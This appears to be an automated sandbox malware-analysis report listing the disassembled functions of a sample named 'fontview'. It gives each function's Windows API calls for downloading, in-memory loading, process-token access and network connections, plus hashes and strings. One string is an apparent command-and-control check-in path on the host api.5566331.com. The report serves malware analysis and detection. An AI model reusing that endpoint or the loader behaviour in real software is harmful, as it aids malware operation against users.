Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 5d4b348e90f931ff1dfb2a7e115a8f775a385ab1ff6a22e6b871e21de8add0f6
Instruction ID: 78209948d3c235d0ccee1f15894afd96e8bb927bde5659be2634817a1c8f91c7
Opcode Fuzzy Hash: 5d4b348e90f931ff1dfb2a7e115a8f775a385ab1ff6a22e6b871e21de8add0f6
Instruction Fuzzy Hash: 59D14C71B00605EFDB26CF48D981A8FB7F9EF48681B24C929E941CB705D731EA50CBA1

Function 1000D124 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 253synchronizationsleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000D17C

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1000D189

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 1000D2B3
Sleep.KERNEL32(000003E8), ref: 1000D415
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?), ref: 1000D44D
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D45B
ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 1000D463
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D46B

Part of subcall function 1000759D: TerminateThread.KERNEL32(?,00000000), ref: 100075D1
Part of subcall function 1000759D: CloseHandle.KERNEL32(?), ref: 100075DD

Strings

/index.php/inface/Heart/getPulgVersion?v=%s&sid=%s, xrefs: 1000D2AD
api.5566331.com, xrefs: 1000D2DD

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle$MutexReleaseTime$FileH_prologSleepSystemTerminateThread__aulldiv__time64_rand_sprintf
String ID: /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s$api.5566331.com
API String ID: 600006260-1514844053
Opcode ID: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
Instruction ID: 3c7cfe678d53cd4cfc3496ea4f5962675d2c477474c38f7e46c86e78bbea2ba5
Opcode Fuzzy Hash: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
Instruction Fuzzy Hash: 61A1BB715047409FE720DF25C885B9EB7F8FF84395F000A2EF596821A6DBB1B684CB62

Function 10032150 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 100321AB
InternetOpenA.WININET(okhttp/3.10.0,00000000,00000000,00000000,00000000), ref: 100321D1
InternetSetOptionA.WININET(?,00000006,000007D0,00000004), ref: 100321F0
InternetOpenUrlA.WININET(?,?,00000000,00000000,04000000,00000000), ref: 10032209
HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 1003224A
InternetReadFile.WININET(?,00000000,0000000F,00000001), ref: 10032288
InternetCloseHandle.WININET(?), ref: 1003230F
_free.LIBCMT ref: 10032343

Strings

, xrefs: 1003222C
okhttp/3.10.0, xrefs: 100321CC

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseFileHandleHttpInfoOptionQueryRead_free_malloc
String ID: $okhttp/3.10.0
API String ID: 3353598147-1811919558
Opcode ID: fce8fc938c830c2deb24c2e3be88f23622ba28b1854e7f66541364a9db49de4a
Instruction ID: 6613a09fe64cb60b8deb12e6b99425ea02e756cb61ab0c2e0afa952f94dfd23c
Opcode Fuzzy Hash: fce8fc938c830c2deb24c2e3be88f23622ba28b1854e7f66541364a9db49de4a
Instruction Fuzzy Hash: 22616BB1D04249EFEB11DF94CC84B9EBBB9FF44701F104229F515AB290DB756A04CB50

Function 1001B144 Relevance: 16.7, APIs: 11, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000000C1,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B15F

Part of subcall function 1001AC3E: SetLastError.KERNEL32(0000000D,1001B18D,?,000001C8), ref: 1001AC44

SetLastError.KERNEL32(000000C1,?,?,000001C8), ref: 1001B1A4
GetNativeSystemInfo.KERNEL32(?,?,?,000001C8), ref: 1001B1F0
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B225
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B23B
GetProcessHeap.KERNEL32(00000008,00000040,?,000001C8), ref: 1001B251
HeapAlloc.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B258
VirtualFree.KERNEL32(00000000,00000000,00008000,?,000001C8), ref: 1001B26B
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,000001C8), ref: 1001B2CE
_memmove.LIBCMT ref: 1001B2DD
SetLastError.KERNEL32(0000045A,?,?,?,?,000001C8), ref: 1001B395

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: AllocErrorLastVirtual$Heap$FreeInfoNativeProcessSystem_memmove
String ID:
API String ID: 321963714-0
Opcode ID: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
Instruction ID: 847e78ca93ded4939880e2626f7d24c040fa23cbcd70bd529c665b21de598f23
Opcode Fuzzy Hash: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
Instruction Fuzzy Hash: E981AB71A00A12ABEB01CF64CD91B6EB7F5FF44384F564058E901DF681E7B4EA91CB90

Function 10011030 Relevance: 15.2, APIs: 10, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10011035

Part of subcall function 10010E45: __EH_prolog.LIBCMT ref: 10010E4A

htonl.WS2_32(?), ref: 10011095
htonl.WS2_32(?), ref: 1001109D
__time64.LIBCMT ref: 100110A3

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

htonl.WS2_32(00000000), ref: 100110AC

Part of subcall function 1001BD49: __EH_prolog.LIBCMT ref: 1001BD4E
Part of subcall function 1001BD49: _sprintf.LIBCMT ref: 1001BDBB

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

htonl.WS2_32(-0000001C), ref: 100111BD
htonl.WS2_32(00000000), ref: 100111C5
_malloc.LIBCMT ref: 100111CB

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_memmove.LIBCMT ref: 100111F5

Part of subcall function 1001127B: __EH_prolog.LIBCMT ref: 10011280

_free.LIBCMT ref: 1001120F

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prologhtonl$_memmove$HeapTime$AllocateErrorFileFreeLastSystem__aulldiv__time64_free_malloc_sprintf
String ID:
API String ID: 3199956779-0
Opcode ID: 660d2a1b3b29a4f5e9a680e581c81ab26005bddc8c6ce2b29fc4db2ef802a2d6
Instruction ID: 835a1f08fa8a8af1b86e20a3026624fe9f93954c30b8a38d983207ef737a5809
Opcode Fuzzy Hash: 660d2a1b3b29a4f5e9a680e581c81ab26005bddc8c6ce2b29fc4db2ef802a2d6
Instruction Fuzzy Hash: 63616D75D00258EFDF15DFA4D891AEEBBB8EF54300F10845AF419A7282DB34AA49CF51

Function 100151F7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100151FC
GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2
GetModuleHandleA.KERNEL32(00000000,1005D0FC,?,1005D0FC,00000000,?,000001C8,?), ref: 1001530A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,000001C8,?), ref: 1001531D
_strrchr.LIBCMT ref: 1001532C

Part of subcall function 1001C0C6: __time64.LIBCMT ref: 1001C0CD
Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0DF
Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0F0

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

Part of subcall function 10009155: _memcmp.LIBCMT ref: 10009180

Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C100

Strings

c:\, xrefs: 10015217
Windows\System32\, xrefs: 10015404, 10015409, 10015411
Windows\, xrefs: 10015244, 10015249, 10015251

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _rand$Module$FileH_prologHandleNamePathTemp__time64_memcmp_memmove_strrchr
String ID: Windows\$Windows\System32\$c:\
API String ID: 2592937688-2965336455
Opcode ID: 0229697d2f4289d93245c8bb9077e40a1819859923537374226eb0cb659c5bc9
Instruction ID: 20a427f31c4f15e36cfe53c2b189bc403b5a0b5ac72e4174fe82cc10685258e7
Opcode Fuzzy Hash: 0229697d2f4289d93245c8bb9077e40a1819859923537374226eb0cb659c5bc9
Instruction Fuzzy Hash: 5C51D17650010ABAEB15EB60DC5AEFF336EDF84290F10411AF6159B096EF74EE898620

Function 100104E4 Relevance: 13.6, APIs: 9, Instructions: 92processstringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100104E9

Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 1001052F
Process32First.KERNEL32(00000000,?), ref: 1001054E
lstrcmpA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?), ref: 10010587
Process32Next.KERNEL32(00000000,00000128), ref: 100105A7
CloseHandle.KERNEL32(00000000,?,?,?), ref: 100105B5
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?), ref: 100105E5
OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?), ref: 100105F2
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 100105FB

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseH_prologHandleOpenProcessProcess32$CreateFirstNextSnapshotTokenToolhelp32lstrcmp
String ID:
API String ID: 1332722264-0
Opcode ID: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
Instruction ID: b62764b0414d32b709b223facb62bba5ffd3a5644e312f6732ebb2b98ad689ba
Opcode Fuzzy Hash: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
Instruction Fuzzy Hash: EA316D75A00228AFEB10EFA4CC99EEEBB79FF04394F004469F51696191DF74AB44CA60

Function 10004568 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000456D
__wfopen_s.LIBCMT ref: 100045DC
CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000080,00000000), ref: 100045FB
GetFileSize.KERNEL32(00000000,00000000), ref: 10004625
CloseHandle.KERNEL32(00000000), ref: 1000462C
__fread_nolock.LIBCMT ref: 1000465A

Strings

Get file size failed!, xrefs: 10004607, 1000460C, 10004614

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: File$CloseCreateH_prologHandleSize__fread_nolock__wfopen_s
String ID: Get file size failed!
API String ID: 2615374186-588257513
Opcode ID: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
Instruction ID: 0f310d6fd00b9f6b04008b82b283a21e80cb63aa65aa8e7d48c89f91d565bf33
Opcode Fuzzy Hash: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
Instruction Fuzzy Hash: 0041E3B6900608BFEB12DBA4CC46FEEB779EF05351F108026FA04F6191DF746A448B66

Function 10026390 Relevance: 12.1, APIs: 8, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
connect.WS2_32(?,00000000,0000001C), ref: 100263CC
WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF
connect.WS2_32(?,00000000,0000001C), ref: 1002640F
WSAEventSelect.WS2_32(?,?,00000023), ref: 10026422
SetLastError.KERNEL32(00000000,?,10026009,?,00000000), ref: 1002643D
GetLastError.KERNEL32(?,10026009,?,00000000), ref: 10026452
WSASetLastError.WS2_32(00000000,?,10026009,?,00000000), ref: 10026463

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLast$EventSelectconnect
String ID:
API String ID: 371153081-0
Opcode ID: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
Instruction ID: 52ca4863fcde4b83e53eff6488bf04bcb13c55dc1b2842da82c1cb5a4742651c
Opcode Fuzzy Hash: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
Instruction Fuzzy Hash: 9421C6302006119BF7249F60EC89B6A77AAEF44721F504628F596C65E0C7B6DC949B60

Function 10044297 Relevance: 10.7, APIs: 7, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

_wcscmp.LIBCMT ref: 1004437D
_wcscmp.LIBCMT ref: 10044393
___lc_wcstolc.LIBCMT ref: 100443BF
___get_qualified_locale.LIBCMT ref: 100443E4

Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A7CD
Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A7E6
Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A801
Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A817
Part of subcall function 1004A78D: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,100443E9,?,?,?,?,00000004,?,00000000), ref: 1004A86B

GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 1004447B
_memmove.LIBCMT ref: 10044531
__invoke_watson.LIBCMT ref: 10044586

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__amsg_exit__getptd_noexit__invoke_watson_memmove
String ID:
API String ID: 3739364018-0
Opcode ID: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
Instruction ID: ff94cb8106a5d527924046aadc737bfe104d0811a886c723f0991959bc7079a2
Opcode Fuzzy Hash: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
Instruction Fuzzy Hash: 76717E76900656ABDB21DF65CC41BEE77B9EF45350F2204B6FD08E6142EF309E808B99

Function 10016228 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100162B8
_memmove.LIBCMT ref: 100162E5
_memmove.LIBCMT ref: 1001631B
_memmove.LIBCMT ref: 10016334
Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1001636D

Strings

deque<T> too long, xrefs: 10016372

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID: deque<T> too long
API String ID: 279611364-309773918
Opcode ID: d7780ab7d97e8d5383d8776bb70a8435f98cd7e962088065fa713099eaab99b4
Instruction ID: 784c8dabccd0a6210e0a94bf7cb842966d568d9ccd1820f8fb5e6c9047be17b7
Opcode Fuzzy Hash: d7780ab7d97e8d5383d8776bb70a8435f98cd7e962088065fa713099eaab99b4
Instruction Fuzzy Hash: 7741F776A00A15AFCB14CE69CD8165EB7F5EF44260B11863CEC25EB780DB31FE54C690

Function 10026470 Relevance: 10.6, APIs: 7, Instructions: 126threadnetworkCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10026482
_free.LIBCMT ref: 100264B5

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_malloc.LIBCMT ref: 100264FC
WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000000FF,00000000), ref: 10026544
WSAGetLastError.WS2_32 ref: 10026580

Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?), ref: 10026961
Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 100269C0
Part of subcall function 10026910: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,B7A91B76,?,76A85E10,7591DF10), ref: 10026A19
Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?,00000000,B7A91B76,?,76A85E10,7591DF10), ref: 10026A2B
Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 10026A6A

GetCurrentThreadId.KERNEL32 ref: 100265A3
GetCurrentThreadId.KERNEL32 ref: 100265C7

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentThread$EnterErrorFreeHeapLastLeave$EventsMultipleWait_free_malloc
String ID:
API String ID: 1895213536-0
Opcode ID: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
Instruction ID: 0298792182ec29e5365059a5bbda46a15199a9bf932673d6ad35eb89bca77991
Opcode Fuzzy Hash: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
Instruction Fuzzy Hash: 094158B0700B629FD710DF25DC84B6ABBE5FF48394F904629E855C7684EB70E854CB91

Function 10025480 Relevance: 10.6, APIs: 7, Instructions: 109networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,00000100,?), ref: 1002550F
_free.LIBCMT ref: 10025524

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

WSASetLastError.WS2_32(00000000), ref: 10025531
_memmove.LIBCMT ref: 1002557D
freeaddrinfo.WS2_32(?), ref: 1002558B
htons.WS2_32(00000000), ref: 10025599
WSASetLastError.WS2_32(00002AF9), ref: 100255BF

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
